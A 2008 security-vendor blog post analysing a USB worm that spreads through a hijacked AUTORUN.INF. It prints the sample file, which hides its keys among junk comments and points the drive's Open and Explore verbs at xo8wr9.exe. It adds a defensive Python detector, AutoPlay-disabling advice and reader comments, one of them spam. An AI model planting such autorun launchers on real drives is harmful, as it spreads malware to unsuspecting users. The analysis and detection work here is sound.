
USB drives infected? A quick analysis

Published: February 04 2008, 01:48 PM
by Rossano Ferraris

Interestingly, the new year 2008 opened its doors with surprising news in the malware field. Hardware infected? Yes, once again the malware authors have shown their extraordinary imagination in spreading panic and disaster across the computing world.

According to recent reports by the SANS Internet Storm Center, there is a new trend of transmitting malware through hardware channels such as USB ports. As you know, the USB port is a very powerful channel used to transfer information and data between our PC and an external device; think, for example, of memory sticks, SD cards for digital cameras, GPS devices and external hard drives. So every device plugged into your PC through a USB port is considered a hard drive, and every device considered a hard drive by your PC can be infected by a compromising malware.

To explain better what happens from the technical point of view, I would like to show you some details of a sample malware I received from one of our customers, who stated that his computer had been compromised after plugging in a USB flash card.

 

The malicious architecture of the malware

The malware (a virus) copies itself to every hard drive, internal and external, altering the AUTORUN.INF file, which (in this incident) appears as follows:


[AutoRun]
;liZc7kkoes7kd22k3D4Z0140fsoid2l47LiHKsLpXafw2Djr3larS5ed04sK503kUDd0Af7kDkK0FwkJ8ooJkLe1rwfrLl
open=xo8wr9.exe
;4dirwkkswijrSKkASFkKd4o2a2KJ54LAo3a5oD92Sppcd34osCwrA0dqfiJZs9L1oLaKw1D33rwLO7f4k3dsjw28offsls0ww4Ka
shell\open\Command=xo8wr9.exe
;r8k4ewsw35irr9S1iidak5oLaqw4k2D3Kf1jjdn1sUKioJlAKLioami
shell\open\Default=1
;LAKiLkkw7j2jIrSsDfFqa3ADLnq2reskSLiloawii5Kl3qaDk5w9L1m2dsklwla24edOw5rlf3w3k4fJj8i
shell\explore\Command=xo8wr9.exe
;aeDAp645K5kL71J5r7aZsc3Iksoj25ak3kaAokiw7wac2dwk1pKes5rJs2disajkLll

The malware (xo8wr9.exe) is launched every time you open your drive, because the Open and Explore verbs in AUTORUN.INF both point at it.
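As an added example (not part of the original post or CA's products), here is a small Python check that parses an AUTORUN.INF of the shape shown above and reports what Windows would launch from it. The embedded sample is constructed from that listing, and the "suspicious" rule is my own heuristic: a launch key pointing at an executable on the drive, combined with hijacked shell verbs or filler comment lines.

```python
import re

# Constructed sample reproducing the AUTORUN.INF listed above, filler ";" comments included.
SAMPLE_AUTORUN = r"""[AutoRun]
;liZc7kkoes7kd22k3D4Z0140fsoid2l47LiHKsLpXafw2Djr3larS5ed04sK503kUDd0Af7kDkK0FwkJ8ooJkLe1rwfrLl
open=xo8wr9.exe
;4dirwkkswijrSKkASFkKd4o2a2KJ54LAo3a5oD92Sppcd34osCwrA0dqfiJZs9L1oLaKw1D33rwLO7f4k3dsjw28offsls0ww4Ka
shell\open\Command=xo8wr9.exe
;r8k4ewsw35irr9S1iidak5oLaqw4k2D3Kf1jjdn1sUKioJlAKLioami
shell\open\Default=1
;LAKiLkkw7j2jIrSsDfFqa3ADLnq2reskSLiloawii5Kl3qaDk5w9L1m2dsklwla24edOw5rlf3w3k4fJj8i
shell\explore\Command=xo8wr9.exe
;aeDAp645K5kL71J5r7aZsc3Iksoj25ak3kaAokiw7wac2dwk1pKes5rJs2disajkLll
"""

# Keys that make Windows run something (on AutoPlay, or when a shell verb is chosen).
LAUNCH_KEY = re.compile(r"^(open|shellexecute|shell\\[^\\]+\\command)$")
EXEC_EXT = (".exe", ".com", ".bat", ".cmd", ".scr", ".pif", ".vbs", ".js")
# A comment that is only a long run of letters and digits is padding, not a real note.
JUNK_COMMENT = re.compile(r"^;[A-Za-z0-9]{30,}$")

def parse_autorun(text):
    """Return ([(key, value), ...] from the [AutoRun] section, count of junk comment lines)."""
    entries, junk, in_autorun = [], 0, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith(";"):
            junk += bool(JUNK_COMMENT.match(line))
        elif line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].lower() == "autorun"
        elif in_autorun and "=" in line:
            key, _, value = line.partition("=")
            entries.append((key.strip().lower(), value.strip()))
    return entries, junk

def assess_autorun(text):
    """Summarise what the file would launch and whether it resembles the incident above."""
    entries, junk = parse_autorun(text)
    targets = sorted({v for k, v in entries if LAUNCH_KEY.match(k)})
    executables = [t for t in targets if t.lower().endswith(EXEC_EXT)]
    hijacks_verbs = any(k.startswith("shell\\") for k, _ in entries)  # Open/Explore redirected
    return {
        "targets": targets,                        # every file a launch key points at
        "executables": executables,                # those that run directly
        "hijacks_explorer_verbs": hijacks_verbs,
        "junk_comment_lines": junk,
        "suspicious": bool(executables) and (hijacks_verbs or junk > 0),
    }
```

Call `assess_autorun(SAMPLE_AUTORUN)` to see the report for the incident file; a vendor file that only sets `label=` and `icon=` yields no targets and is not flagged.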


It not only copies itself to other drives; according to this incident analysis, I found that it also drops other malware onto your PC and starts a hidden connection to a remote malicious server in China.

CA users and customers are protected from this malware by detection in our CA anti-malware solutions (CA Anti-Virus and CA Anti-Spyware), but to help prevent future incidents I would like to offer some recommendations:


  • Regularly update your anti-malware solutions to the latest signatures
  • If possible, disable the Windows AutoPlay feature
    • Start menu > Run and type “gpedit.msc”
    • Select Administrative Templates > System
    • In the right-hand pane you will see an item called “Turn off Autoplay”
    • Double-click the item and set the radio button to Enabled
    • Change “Turn off Autoplay on” to All Drives
  • Scan your external USB device with AutoPlay disabled before browsing it


By: Rossano Ferraris
Rossano Ferraris based in Italy and is the functional lead of the Internet Security Intelligence team, within CA’s Internet Security Business Unit (CA ISBU). His main objectives are to identify emerging and prevalent threats in order to provide strategic security responses to the internet security and...

5 people have left comments:

Very good tip to turn off autoplay. Simple yet can be very effective. Going further, I've seen some businesses disable the USB ports on their users' desktops and even use Data Leak Prevention software to disable it and, using policy, pick and choose which users to enable it for.

Posted by: Lani Refiti | February 4, 2008 7:32 PM

"So every device plugged into your PC through a USB port is considered a hard drive, and every device considered a hard drive by your PC can be infected by a compromising malware"

Oh no, my webcamz and keyboardz are infected!!!1one!

Posted by: USB memory stick | May 28, 2008 4:37 AM

Is there any way to get the CA anti-virus product to scan the USB device automatically on connection?

Posted by: Debbie Anacoura | January 30, 2009 9:31 AM

I recently came across your blog and have been reading along. I thought I would leave my first comment. I don't know what to say except that I have enjoyed reading. Nice blog. I will keep visiting this blog very often.

Joannah

http://2gbmemory.net

Posted by: Joannah | March 19, 2009 6:05 AM
